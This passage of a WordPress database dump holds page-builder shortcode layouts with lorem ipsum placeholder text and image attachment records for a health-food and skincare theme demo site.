item_padding_680_768=\"100px 136px 50px 11.5%\" item_padding_768_1024=\"100px 240px 86px 11.6%\" item_padding_1024_1280=\"141px 0 176px 28.5%\" item_padding_1280_1600=\"141px 0 176px 23.5%\"][qodef_section_title type=\"standard\" position=\"\" subtitle_tag=\"\" title_tag=\"h2\" disable_break_words=\"no\" subtitle=\"SWEET & HEALTY FOOD\" title=\"Natural Ingredients\" title_color=\"#ffffff\" subtitle_color=\"#ffffff\"][vc_column_text]It is a long established fact that a reader will be distracted by the readable content of a page when looking at its layout. The point of using Lorem Ipsum is that it has a more-or-less. he readable content of a page when looking at its layout. The point of using Lorem Ipsum.[/vc_column_text][vc_empty_space][qodef_button text=\"view more\" target=\"_self\" icon_pack=\"\" font_weight=\"\" text_transform=\"\"][/qodef_elements_holder_item][qodef_elements_holder_item item_padding=\"11px 0% 0 81px\" item_padding_680=\"0px 11.6% 100px 11.6%\" item_padding_680_768=\"0px 0% 100px 81px\" item_padding_768_1024=\"0px 0% 100px 115px\"][qodef_video_button video_image=\"453\" video_link=\"https://vimeo.com/109163564\" play_button_size=\"20\"][/qodef_elements_holder_item][/qodef_elements_holder][/vc_column][/vc_row][vc_row row_content_width=\"grid\" css=\".vc_custom_1519212973686{padding-top: 120px !important;padding-bottom: 113px !important;}\"][vc_column offset=\"vc_col-lg-5 vc_col-md-12\"][qodef_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"1024\" alignment_one_column=\"\"][qodef_elements_holder_item item_padding=\"0 0 0px 83px\" item_padding_680=\"0 0 100px 33px\" item_padding_680_768=\"0 0 95px 182px\" item_padding_768_1024=\"0 0 109px 246px\"][qodef_single_image enable_image_shadow=\"no\" image=\"1584\" image_size=\"246x460\"][/qodef_elements_holder_item][/qodef_elements_holder][/vc_column][vc_column offset=\"vc_col-lg-7 vc_col-md-12\"][qodef_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"1024\" alignment_one_column=\"\"][qodef_elements_holder_item item_padding=\"0 0 0 0 \" item_padding_680_768=\"0 35px 109px 16px \"][qodef_section_title type=\"standard\" position=\"\" subtitle_tag=\"\" title_tag=\"h2\" disable_break_words=\"no\" text_tag=\"p\" text_font_weight=\"\" subtitle=\"SWEET & HEALTY FOOD\" title=\"Detox plan SEVEN \" text=\"It is a long established fact that a reader will be distracted by the readable content of a page when looking at its layout. The point of using Lorem Ipsum is that it has a more-or-less. he readable content of a page when looking at its layout.\"][qodef_progress_bar title_tag=\"h5\" percent=\"38\" title=\"Aloe Shots\"][qodef_progress_bar title_tag=\"h5\" percent=\"53\" title=\"Smoothies\"][qodef_progress_bar title_tag=\"h5\" percent=\"63\" title=\"Veggie Wraps\"][qodef_progress_bar title_tag=\"h5\" percent=\"79\" title=\"Supplements\"][/qodef_elements_holder_item][/qodef_elements_holder][/vc_column][/vc_row]','What We Offer','','publish','closed','closed','','what-we-offer','','','2018-01-22 15:21:13','2018-01-22 15:21:13','',0,'http://succulents.select-themes.com/?page_id=406',0,'page','',0),(408,1,'2018-01-22 15:19:17','2018-01-22 15:19:17','','h2-img-12','','inherit','open','closed','','h2-img-12','','','2018-01-22 15:19:17','2018-01-22 15:19:17','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/h2-img-12.jpg',0,'attachment','image/jpeg',0),(409,1,'2018-01-22 15:19:54','2018-01-22 15:19:54','','h2-img-13','','inherit','open','closed','','h2-img-13','','','2018-01-22 15:19:54','2018-01-22 15:19:54','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/h2-img-13.png',0,'attachment','image/png',0),(429,1,'2018-01-22 15:36:01','2018-01-22 15:36:01','','h2-img-14','','inherit','open','closed','','h2-img-14','','','2018-01-22 15:36:01','2018-01-22 15:36:01','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/h2-img-14.png',0,'attachment','image/png',0),(431,1,'2018-01-22 15:36:26','2018-01-22 15:36:26','','h2-img-15','','inherit','open','closed','','h2-img-15-2','','','2018-01-22 15:36:26','2018-01-22 15:36:26','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/h2-img-15-1.png',0,'attachment','image/png',0),(432,1,'2018-01-22 15:36:55','2018-01-22 15:36:55','','h2-img-16','','inherit','open','closed','','h2-img-16','','','2018-01-22 15:36:55','2018-01-22 15:36:55','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/h2-img-16.png',0,'attachment','image/png',0),(453,1,'2018-01-22 16:24:02','2018-01-22 16:24:02','','video-button','','inherit','open','closed','','video-button','','','2018-01-22 16:24:02','2018-01-22 16:24:02','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/video-button.jpg',0,'attachment','image/jpeg',0),(470,1,'2018-01-23 09:19:26','2018-01-23 09:19:26','','what-we-do-img-2','','inherit','open','closed','','what-we-do-img-2','','','2018-01-23 09:19:26','2018-01-23 09:19:26','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/what-we-do-img-2.png',0,'attachment','image/png',0),(541,1,'2018-01-23 11:56:54','2018-01-23 11:56:54','','pin','','inherit','open','closed','','pin','','','2018-01-23 11:56:54','2018-01-23 11:56:54','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/pin.png',0,'attachment','image/png',0),(550,1,'2018-01-23 13:02:39','2018-01-23 13:02:39','[vc_row][vc_column][rev_slider alias=\"home-3\"][/vc_column][/vc_row][vc_row row_content_width=\"grid\" content_text_aligment=\"right\"][vc_column][qodef_elements_holder holder_full_height=\"no\" number_of_columns=\"two-columns\" switch_to_one_column=\"\" alignment_one_column=\"\"][qodef_elements_holder_item item_padding=\"130px 15px 97px 10px\"][qodef_section_title type=\"standard\" position=\"\" subtitle_tag=\"\" title_tag=\"h2\" disable_break_words=\"no\" subtitle=\"NATURAL COSMETICS\" title=\"Rose Mineral Cream\"][vc_empty_space height=\"10px\"][vc_column_text]\n

Itis a long established fact that a reader will be distracted by the readable mo content of a page when looking at its layout. The point of using Lorem Ipsum that it has a more-or-less. he readable content of a page when looking at its layout. The point of using Lorem Ipsum.

\n[/vc_column_text][/qodef_elements_holder_item][qodef_elements_holder_item item_padding=\"130px 0px 125px 92px\" item_padding_680=\"0px 0px 116px 34px\"][qodef_single_image enable_image_shadow=\"no\" image=\"553\"][/qodef_elements_holder_item][/qodef_elements_holder][/vc_column][/vc_row][vc_row row_content_width=\"grid\"][vc_column][qodef_elements_holder holder_full_height=\"no\" number_of_columns=\"two-columns\" switch_to_one_column=\"\" alignment_one_column=\"\"][qodef_elements_holder_item item_padding=\"21px 0px 120px 24px\" item_padding_680_768=\"21px 0px 120px 100px\"][qodef_single_image enable_image_shadow=\"no\" image=\"556\"][/qodef_elements_holder_item][qodef_elements_holder_item item_padding=\"0px 0px 139px 0px\"][qodef_section_title type=\"standard\" position=\"\" subtitle_tag=\"\" title_tag=\"h2\" disable_break_words=\"no\" subtitle=\"NATURAL COSMETICS\" title=\"Organic Soap\"][vc_empty_space height=\"10px\"][vc_column_text]\n

Itis a long established fact that a reader will be distracted by the readable mo content of a page when looking at its layout. The point of using Lorem Ipsum that it has a more-or-less. he readable content of a page when looking at its layout. The point of using Lorem Ipsum.

\n[/vc_column_text][/qodef_elements_holder_item][/qodef_elements_holder][/vc_column][/vc_row][vc_row row_content_width=\"grid\" content_text_aligment=\"right\"][vc_column][qodef_elements_holder holder_full_height=\"no\" number_of_columns=\"two-columns\" switch_to_one_column=\"\" alignment_one_column=\"\"][qodef_elements_holder_item item_padding=\"0px 10px 133px 10px\" item_padding_680_768=\"0px 12px 96px 7px\"][qodef_section_title type=\"standard\" position=\"\" subtitle_tag=\"\" title_tag=\"h2\" disable_break_words=\"no\" subtitle=\"NATURAL COSMETICS\" title=\"Makeup Brush\"][vc_empty_space height=\"10px\"][vc_column_text]\n

Itis a long established fact that a reader will be distracted by the readable mo content of a page when looking at its layout. The point of using Lorem Ipsum that it has a more-or-less. he readable content of a page when looking at its layout. The point of using Lorem Ipsum.

\n[/vc_column_text][/qodef_elements_holder_item][qodef_elements_holder_item item_padding=\"0px 99px 139px 103px\" item_padding_680=\"0px 0px 100px 28px\"][qodef_single_image enable_image_shadow=\"no\" image=\"558\"][/qodef_elements_holder_item][/qodef_elements_holder][/vc_column][/vc_row][vc_row content_placement=\"middle\" parallax_background_image=\"570\"][vc_column][qodef_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][qodef_elements_holder_item horizontal_alignment=\"center\" item_padding=\"120px 29% 120px 29%\" item_padding_1280_1600=\"120px 23% 120px 23%\" item_padding_1024_1280=\"120px 21% 120px 21%\" item_padding_680=\"120px 7% 120px 7%\" item_padding_680_768=\"120px 10% 120px 10%\" item_padding_768_1024=\"135px 22% 145px\"][qodef_section_title type=\"standard\" position=\"\" subtitle_tag=\"\" title_tag=\"h1\" disable_break_words=\"no\" subtitle=\"SWEET & HEALTHY FOOD\" subtitle_color=\"#ffffff\" title=\"You Have a Choice\" title_color=\"#ffffff\"][vc_empty_space height=\"23px\"][vc_column_text css=\".vc_custom_1519044427796{margin-top: -9px !important;}\"]\n

Lorem ipsum dolor sit amet, consectetur adipiscing elit. Mauris mauris nisi, ultricies ut dui sit amet, lacinia pulvinar nisi. Ut tristique posuere massa, non hendrerit ipsum egestas a. Quisque fermentum fringilla magna sit amet blandit. Praesent volutpat ante in neque ultrices, ut sollicitudin erat venenatis.

\n[/vc_column_text][vc_empty_space height=\"30px\"][qodef_button text=\"view more\" target=\"_self\" icon_pack=\"\" font_weight=\"\" text_transform=\"\" color=\"#ffbea5\" background_color=\"#ffffff\"][/qodef_elements_holder_item][/qodef_elements_holder][/vc_column][/vc_row][vc_row row_content_width=\"grid\" css=\".vc_custom_1518011363904{padding-top: 120px !important;padding-bottom: 88px !important;}\"][vc_column][products columns=\"4\" orderby=\"ID\" order=\"ASC\" ids=\"1080, 1095, 1096, 1110, 1097, 1108, 1109, 1098\"][/vc_column][/vc_row][vc_row row_content_width=\"grid\" parallax_background_image=\"592\" css=\".vc_custom_1519717725100{padding-top: 98px !important;padding-bottom: 91px !important;}\"][vc_column][vc_column_text]\n
SWEET & HEALTHY FOOD
\n[/vc_column_text][vc_column_text css=\".vc_custom_1516721318573{margin-top: -6px !important;}\"]\n

Healthy Packages

\n[/vc_column_text][vc_empty_space height=\"63px\"][qodef_pricing_table columns=\"qodef-three-columns\" space_between_items=\"normal\"][qodef_pricing_table_item title=\"Standard\" button_text=\"view more\" button_type=\"solid\" price=\"59\" link=\"#\"]\n
    \n
  • 100% Pure Products
  • \n
  • Mineral Makeup
  • \n
  • Free Nutrition book
  • \n
  • 12 Workshops
  • \n
  • Mica Pigments
  • \n
\n[/qodef_pricing_table_item][qodef_pricing_table_item title=\"Premium\" button_text=\"view more\" button_type=\"solid\" price=\"79\" link=\"#\"]\n
    \n
  • 100% Pure Products
  • \n
  • Mineral Makeup
  • \n
  • Free Nutrition book
  • \n
  • 12 Workshops
  • \n
  • Mica Pigments
  • \n
\n[/qodef_pricing_table_item][qodef_pricing_table_item title=\"Platinum\" button_text=\"view more\" button_type=\"solid\" price=\"99\" link=\"#\"]\n
    \n
  • 100% Pure Products
  • \n
  • Mineral Makeup Free
  • \n
  • Nutrition book
  • \n
  • 12 Workshops
  • \n
  • Mica Pigments
  • \n
\n[/qodef_pricing_table_item][/qodef_pricing_table][/vc_column][/vc_row][vc_row row_content_width=\"grid\" css=\".vc_custom_1520416713120{padding-top: 145px !important;padding-bottom: 110px !important;}\"][vc_column][qodef_item_showcase image_top_offset=\"-26px\" item_image=\"645\"][qodef_item_showcase_item item_position=\"right\" item_title_tag=\"h3\" item_title=\"Essential Oils\" item_title_color=\"#3c3c3c\" item_text=\"It is a long established fact that a reader will be distracted by the readable content of a page when looking at its layout. The point of using\" item_text_color=\"#9e9e9e\"][/qodef_item_showcase_item][qodef_item_showcase_item item_position=\"left\" item_title_tag=\"h3\" item_title=\"Organic & Pure\" item_title_color=\"#3c3c3c\" item_text=\"It is a long established fact that a reader will be distracted by the readable content of a page when looking at its layout. The point of using\" item_text_color=\"#9e9e9e\"][/qodef_item_showcase_item][qodef_item_showcase_item item_position=\"right\" item_title_tag=\"h3\" item_title=\"Safe Package\" item_title_color=\"#3c3c3c\" item_text=\"It is a long established fact that a reader will be distracted by the readable content of a page when looking at its layout. The point of using\" item_text_color=\"#9e9e9e\"][/qodef_item_showcase_item][qodef_item_showcase_item item_position=\"left\" item_title_tag=\"h3\" item_title=\"Safe Package\" item_title_color=\"#3c3c3c\" item_text=\"It is a long established fact that a reader will be distracted by the readable content of a page when looking at its layout. The point of using\" item_text_color=\"#9e9e9e\"][/qodef_item_showcase_item][/qodef_item_showcase][/vc_column][/vc_row][vc_row row_content_width=\"grid\" simple_background_color=\"#ffbea5\" css=\".vc_custom_1516782288351{padding-top: 49px !important;padding-bottom: 49px !important;}\"][vc_column offset=\"vc_col-lg-offset-1 vc_col-lg-10 vc_col-md-offset-0 vc_col-md-12 vc_col-sm-offset-0\"][qodef_call_to_action layout=\"normal\" button_text=\"view more\" button_type=\"solid\" button_size=\"\" button_link=\"#\" button_color=\"#ffbea5\" button_background_color=\"#ffffff\"]\n

Lorem ipsum dolor sit amet, no quem homero ius, meis munere .

\n[/qodef_call_to_action][/vc_column][/vc_row]','Skincare Home','','publish','closed','closed','','skincare-home','','','2018-01-23 13:02:39','2018-01-23 13:02:39','',0,'http://succulents.select-themes.com/?page_id=550',0,'page','',0),(553,1,'2018-01-23 13:32:58','2018-01-23 13:32:58','','h3-img1','','inherit','open','closed','','h3-img1','','','2018-01-23 13:32:58','2018-01-23 13:32:58','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/h3-img1.png',0,'attachment','image/png',0),(556,1,'2018-01-23 13:35:50','2018-01-23 13:35:50','','h3-img2','','inherit','open','closed','','h3-img2','','','2018-01-23 13:35:50','2018-01-23 13:35:50','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/h3-img2.png',0,'attachment','image/png',0),(558,1,'2018-01-23 13:36:11','2018-01-23 13:36:11','','h3-img3','','inherit','open','closed','','h3-img3','','','2018-01-23 13:36:11','2018-01-23 13:36:11','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/h3-img3.png',0,'attachment','image/png',0),(566,1,'2020-04-09 11:44:54','2020-04-09 11:44:54','','Logo-New-TR-web','','inherit','open','closed','','logo-new-tr-web-3','','','2020-04-09 11:45:01','2020-04-09 11:45:01','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/Logo-New-TR-web.jpg',0,'attachment','image/jpeg',0),(570,1,'2018-01-23 14:01:35','2018-01-23 14:01:35','','h3-img4','','inherit','open','closed','','h3-img4','','','2018-01-23 14:01:35','2018-01-23 14:01:35','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/h3-img4.jpg',0,'attachment','image/jpeg',0),(585,1,'2018-01-23 15:12:50','2018-01-23 15:12:50','[vc_row][vc_column][qodef_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][qodef_elements_holder_item item_padding=\"0 0 0 0\"][rev_slider_vc alias=\"home-10\" enable_paspartu=\"no\"][/qodef_elements_holder_item][/qodef_elements_holder][/vc_column][/vc_row]','Full Screen Showcase','','publish','closed','closed','','full-screen-showcase','','','2018-01-23 15:12:50','2018-01-23 15:12:50','',0,'http://succulents.select-themes.com/?page_id=585',0,'page','',0),(591,1,'2018-01-23 15:21:22','2018-01-23 15:21:22','','h10-slide1-graphic1','','inherit','open','closed','','h10-slide1-graphic1','','','2018-01-23 15:21:22','2018-01-23 15:21:22','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/h10-slide1-graphic1.jpg',0,'attachment','image/jpeg',0),(592,1,'2018-01-23 15:27:25','2018-01-23 15:27:25','','h3-img5','','inherit','open','closed','','h3-img5','','','2018-01-23 15:27:25','2018-01-23 15:27:25','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/h3-img5.jpg',0,'attachment','image/jpeg',0),(593,1,'2018-01-23 15:28:35','2018-01-23 15:28:35','','h10-slide1-graphic2','','inherit','open','closed','','h10-slide1-graphic2','','','2018-01-23 15:28:35','2018-01-23 15:28:35','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/h10-slide1-graphic2.png',0,'attachment','image/png',0),(601,1,'2018-01-23 15:52:59','2018-01-23 15:52:59','[vc_row][vc_column][qodef_button size=\"medium\" text=\"view more\" target=\"_self\" icon_pack=\"\" font_weight=\"\" text_transform=\"\"][/vc_column][/vc_row]','test','','publish','closed','closed','','test','','','2018-01-23 15:52:59','2018-01-23 15:52:59','',0,'http://succulents.select-themes.com/?page_id=601',0,'page','',0),(610,1,'2018-01-23 16:12:24','2018-01-23 16:12:24','','h10-slide2-graphic1','','inherit','open','closed','','h10-slide2-graphic1','','','2018-01-23 16:12:24','2018-01-23 16:12:24','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/h10-slide2-graphic1.jpg',0,'attachment','image/jpeg',0),(611,1,'2018-01-23 16:13:30','2018-01-23 16:13:30','','h10-slide2-graphic2','','inherit','open','closed','','h10-slide2-graphic2','','','2018-01-23 16:13:30','2018-01-23 16:13:30','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/h10-slide2-graphic2.png',0,'attachment','image/png',0),(631,1,'2018-01-24 08:31:33','2018-01-24 08:31:33','','h10-slide2-graphic3','','inherit','open','closed','','h10-slide2-graphic3','','','2018-01-24 08:31:33','2018-01-24 08:31:33','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/h10-slide2-graphic3.jpg',0,'attachment','image/jpeg',0),(642,1,'2018-01-24 09:55:43','2018-01-24 09:55:43','','h10-slide3-graphic1','','inherit','open','closed','','h10-slide3-graphic1','','','2018-01-24 09:55:43','2018-01-24 09:55:43','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/h10-slide3-graphic1.jpg',0,'attachment','image/jpeg',0),(643,1,'2018-01-24 09:57:39','2018-01-24 09:57:39','','h10-slide4-graphic1','','inherit','open','closed','','h10-slide4-graphic1','','','2018-01-24 09:57:39','2018-01-24 09:57:39','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/h10-slide4-graphic1.jpg',0,'attachment','image/jpeg',0),(644,1,'2018-01-24 09:58:05','2018-01-24 09:58:05','','h10-slide5-graphic1','','inherit','open','closed','','h10-slide5-graphic1','','','2018-01-24 09:58:05','2018-01-24 09:58:05','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/h10-slide5-graphic1.jpg',0,'attachment','image/jpeg',0),(645,1,'2018-01-24 10:14:58','2018-01-24 10:14:58','','h3-img6','','inherit','open','closed','','h3-img6','','','2018-01-24 10:14:58','2018-01-24 10:14:58','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/h3-img6.png',0,'attachment','image/png',0),(650,1,'2018-01-24 10:22:27','2018-01-24 10:22:27','[vc_row][vc_column][rev_slider_vc alias=\"home-4\" enable_paspartu=\"no\"][/vc_column][/vc_row][vc_row row_content_width=\"grid\" css=\".vc_custom_1519294522702{padding-top: 117px !important;padding-bottom: 90px !important;}\"][vc_column][qodef_section_title type=\"standard\" position=\"center\" subtitle_tag=\"\" title_tag=\"h1\" disable_break_words=\"no\" subtitle=\"SWEET & HEALTHY FOOD\" title=\"Spa & Beauty Center\"][vc_empty_space height=\"65px\"][qodef_portfolio_list type=\"masonry\" number_of_columns=\"3\" space_between_items=\"normal\" enable_fixed_proportions=\"yes\" enable_image_shadow=\"no\" orderby=\"date\" order=\"ASC\" enable_category=\"no\" enable_article_animation=\"yes\" category=\"spa\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1520335816784{background-image: url(http://succulents.select-themes.com/wp-content/uploads/2018/03/h4-img-14.jpg?id=4049) !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}\"][vc_column][qodef_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][qodef_elements_holder_item item_padding=\"83px 50% 123px 17.2%\" item_padding_768_1024=\"84px 41% 124px 12.2%\" item_padding_680=\"100px 4% 132px 10%\" item_padding_1024_1280=\"84px 42% 124px 7.7%\" item_padding_1280_1600=\"84px 42% 125px 7.7%\" item_padding_680_768=\"85px 42% 124px 11.2%\"][qodef_section_title type=\"standard\" position=\"\" subtitle_tag=\"\" title_tag=\"\" disable_break_words=\"no\" subtitle=\"SWEET & HEALTHY FOOD\" title=\"Wellness Therapy\"][vc_empty_space height=\"10px\"][vc_column_text]Lorem ipsum dolor sit amet, consectetur adipiscing elit. Pellentesque tincidunt congue mi et lobortis. Proin bibendum dolor sed lobortis efficitur. Fusce dictum dapibus pulvinar. Etiam at molestie quam.[/vc_column_text][vc_empty_space][qodef_button text=\"view more\" target=\"_self\" icon_pack=\"\" font_weight=\"\" text_transform=\"\"][/qodef_elements_holder_item][/qodef_elements_holder][/vc_column][/vc_row][vc_row row_content_width=\"grid\" css=\".vc_custom_1519294731545{padding-top: 120px !important;padding-bottom: 62px !important;}\"][vc_column][qodef_section_title type=\"standard\" position=\"center\" subtitle_tag=\"\" title_tag=\"h1\" disable_break_words=\"no\" subtitle=\"SWEET & HEALTHY FOOD\" title=\"Healthy Soul\"][vc_empty_space height=\"58px\"][qodef_blog_list type=\"standard\" number_of_columns=\"3\" space_between_items=\"small\" orderby=\"date\" order=\"DESC\" image_size=\"full\" number_of_posts=\"3\" category=\"vegan\" excerpt_length=\"17\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" row_content_width=\"grid\" parallax_background_image=\"3406\"][vc_column][qodef_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][qodef_elements_holder_item horizontal_alignment=\"center\" item_padding=\"100px 20% 122px 20%\" item_padding_768_1024=\"101px 10% 130px 10% \" item_padding_680_768=\"111px 0% 129px 0%\" item_padding_680=\"120px 0% 120px 0%\" item_padding_1280_1600=\"101px 17% 120px 17%\" item_padding_1024_1280=\"101px 16% 120px 16%\"][qodef_section_title type=\"standard\" position=\"center\" title_tag=\"h1\" disable_break_words=\"no\" text_tag=\"\" text_font_weight=\"\" title=\"Spa Center for You\" text=\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Pellentesque tincidunt congue mi et lobortis. Proin bibendum dolor sed lobortis efficitur. Fusce dictum dapibus pulvinar. Etiam at molestie quam. Nam non tellus sit amet purus finibus viverra.\"][qodef_button text=\"view more\" target=\"_self\" icon_pack=\"\" font_weight=\"\" text_transform=\"\" margin=\"35px 0 0 0 \"][/qodef_elements_holder_item][/qodef_elements_holder][/vc_column][/vc_row][vc_row row_content_width=\"grid\" css=\".vc_custom_1520412920558{padding-top: 117px !important;padding-bottom: 110px !important;}\"][vc_column][qodef_tabs type=\"vertical\"][qodef_tabs_item content_title_tag=\"h2\" tab_title=\"Who we do\" tab_content_description=\"It is a long established fact that a reader will be distracted by the readable content of a page when looking at its layout. The point of using Lorem Ipsum is that it has a more-or-less. he readable content of a page when looking at its layout.\" tab_content_title=\"Pilates Everyday\" tab_image=\"1919\"][qodef_icon_with_text type=\"icon-left\" icon_pack=\"font_elegant\" fe_icon=\"icon_check\" icon_size=\"qodef-icon-small\" text=\"The Key To Success Is Staying On Target.\" custom_icon_size=\"16\" icon_color=\"#ffbea5\"][qodef_icon_with_text type=\"icon-left\" icon_pack=\"font_elegant\" fe_icon=\"icon_check\" icon_size=\"qodef-icon-small\" text=\"The Friendlier, Easier Place to Bank.\" custom_icon_size=\"16\" icon_color=\"#ffbea5\"][qodef_icon_with_text type=\"icon-left\" icon_pack=\"font_elegant\" fe_icon=\"icon_check\" icon_size=\"qodef-icon-small\" text=\"From Humble Beginnings Come Great Things.\" custom_icon_size=\"16\" icon_color=\"#ffbea5\"][qodef_icon_with_text type=\"icon-left\" icon_pack=\"font_elegant\" fe_icon=\"icon_check\" icon_size=\"qodef-icon-small\" text=\"From Humble Beginnings Come Great Things.\" custom_icon_size=\"16\" icon_color=\"#ffbea5\"][qodef_icon_with_text type=\"icon-left\" icon_pack=\"font_elegant\" fe_icon=\"icon_check\" icon_size=\"qodef-icon-small\" text=\"The Key To Success Is Staying On Target With A Positive \" custom_icon_size=\"16\" icon_color=\"#ffbea5\"][qodef_icon_with_text type=\"icon-left\" icon_pack=\"font_elegant\" fe_icon=\"icon_check\" icon_size=\"qodef-icon-small\" text=\"The friendlier, easier place to make better decisions\" custom_icon_size=\"16\" icon_color=\"#ffbea5\"][/qodef_tabs_item][qodef_tabs_item content_title_tag=\"h2\" tab_title=\"We’re already there\" tab_content_description=\"It is a long established fact that a reader will be distracted by the readable content of a page when looking at its layout. The point of using Lorem Ipsum is that it has a more-or-less. he readable content of a page when looking at its layout.\" tab_content_title=\"Organic Soaps\" tab_image=\"3112\"][qodef_icon_with_text type=\"icon-left\" icon_pack=\"font_elegant\" fe_icon=\"icon_check\" icon_size=\"qodef-icon-small\" text=\"The Friendlier, Easier Place to Bank.\" custom_icon_size=\"16\" icon_color=\"#ffbea5\"][qodef_icon_with_text type=\"icon-left\" icon_pack=\"font_elegant\" fe_icon=\"icon_check\" icon_size=\"qodef-icon-small\" text=\"From Humble Beginnings Come Great Things.\" custom_icon_size=\"16\" icon_color=\"#ffbea5\"][qodef_icon_with_text type=\"icon-left\" icon_pack=\"font_elegant\" fe_icon=\"icon_check\" icon_size=\"qodef-icon-small\" text=\"The Key To Success Is Staying On Target.\" custom_icon_size=\"16\" icon_color=\"#ffbea5\"][qodef_icon_with_text type=\"icon-left\" icon_pack=\"font_elegant\" fe_icon=\"icon_check\" icon_size=\"qodef-icon-small\" text=\"The friendlier, easier place to bank.\" custom_icon_size=\"16\" icon_color=\"#ffbea5\"][qodef_icon_with_text type=\"icon-left\" icon_pack=\"font_elegant\" fe_icon=\"icon_check\" icon_size=\"qodef-icon-small\" text=\"The Key To Success Is Staying On Target With A Positive \" custom_icon_size=\"16\" icon_color=\"#ffbea5\"][qodef_icon_with_text type=\"icon-left\" icon_pack=\"font_elegant\" fe_icon=\"icon_check\" icon_size=\"qodef-icon-small\" text=\"The friendlier, easier place to bank.\" custom_icon_size=\"16\" icon_color=\"#ffbea5\"][/qodef_tabs_item][qodef_tabs_item content_title_tag=\"h2\" tab_title=\"The company you keep\" tab_content_description=\"It is a long established fact that a reader will be distracted by the readable content of a page when looking at its layout. The point of using Lorem Ipsum is that it has a more-or-less. he readable content of a page when looking at its layout.\" tab_content_title=\"Spa Retreat\" tab_image=\"3113\"][qodef_icon_with_text type=\"icon-left\" icon_pack=\"font_elegant\" fe_icon=\"icon_check\" icon_size=\"qodef-icon-small\" text=\"From Humble Beginnings Come Great Things.\" custom_icon_size=\"16\" icon_color=\"#ffbea5\"][qodef_icon_with_text type=\"icon-left\" icon_pack=\"font_elegant\" fe_icon=\"icon_check\" icon_size=\"qodef-icon-small\" text=\"The Friendlier, Easier Place to Bank.\" custom_icon_size=\"16\" icon_color=\"#ffbea5\"][qodef_icon_with_text type=\"icon-left\" icon_pack=\"font_elegant\" fe_icon=\"icon_check\" icon_size=\"qodef-icon-small\" text=\"The Key To Success Is Staying On Target With A Positive \" custom_icon_size=\"16\" icon_color=\"#ffbea5\"][qodef_icon_with_text type=\"icon-left\" icon_pack=\"font_elegant\" fe_icon=\"icon_check\" icon_size=\"qodef-icon-small\" text=\"The Key To Success Is Staying On Target.\" custom_icon_size=\"16\" icon_color=\"#ffbea5\"][qodef_icon_with_text type=\"icon-left\" icon_pack=\"font_elegant\" fe_icon=\"icon_check\" icon_size=\"qodef-icon-small\" text=\"From Humble Beginnings Come Great Things.\" custom_icon_size=\"16\" icon_color=\"#ffbea5\"][qodef_icon_with_text type=\"icon-left\" icon_pack=\"font_elegant\" fe_icon=\"icon_check\" icon_size=\"qodef-icon-small\" text=\"The friendlier, easier place to bank.\" custom_icon_size=\"16\" icon_color=\"#ffbea5\"][/qodef_tabs_item][qodef_tabs_item content_title_tag=\"h2\" tab_title=\"Your financial bridge\" tab_content_description=\"It is a long established fact that a reader will be distracted by the readable content of a page when looking at its layout. The point of using Lorem Ipsum is that it has a more-or-less. he readable content of a page when looking at its layout.\" tab_content_title=\"Clean Water\" tab_image=\"4111\"][qodef_icon_with_text type=\"icon-left\" icon_pack=\"font_elegant\" fe_icon=\"icon_check\" icon_size=\"qodef-icon-small\" text=\"From Humble Beginnings Come Great Things.\" custom_icon_size=\"16\" icon_color=\"#ffbea5\"][qodef_icon_with_text type=\"icon-left\" icon_pack=\"font_elegant\" fe_icon=\"icon_check\" icon_size=\"qodef-icon-small\" text=\"The Key To Success Is Staying On Target.\" custom_icon_size=\"16\" icon_color=\"#ffbea5\"][qodef_icon_with_text type=\"icon-left\" icon_pack=\"font_elegant\" fe_icon=\"icon_check\" icon_size=\"qodef-icon-small\" text=\"The Friendlier, Easier Place to Bank.\" custom_icon_size=\"16\" icon_color=\"#ffbea5\"][qodef_icon_with_text type=\"icon-left\" icon_pack=\"font_elegant\" fe_icon=\"icon_check\" icon_size=\"qodef-icon-small\" text=\"From Humble Beginnings Come Great Things.\" custom_icon_size=\"16\" icon_color=\"#ffbea5\"][qodef_icon_with_text type=\"icon-left\" icon_pack=\"font_elegant\" fe_icon=\"icon_check\" icon_size=\"qodef-icon-small\" text=\"The Key To Success Is Staying On Target With A Positive \" custom_icon_size=\"16\" icon_color=\"#ffbea5\"][qodef_icon_with_text type=\"icon-left\" icon_pack=\"font_elegant\" fe_icon=\"icon_check\" icon_size=\"qodef-icon-small\" text=\"The friendlier, easier place to bank.\" custom_icon_size=\"16\" icon_color=\"#ffbea5\"][/qodef_tabs_item][qodef_tabs_item content_title_tag=\"h2\" tab_title=\"Quality in everything we do\" 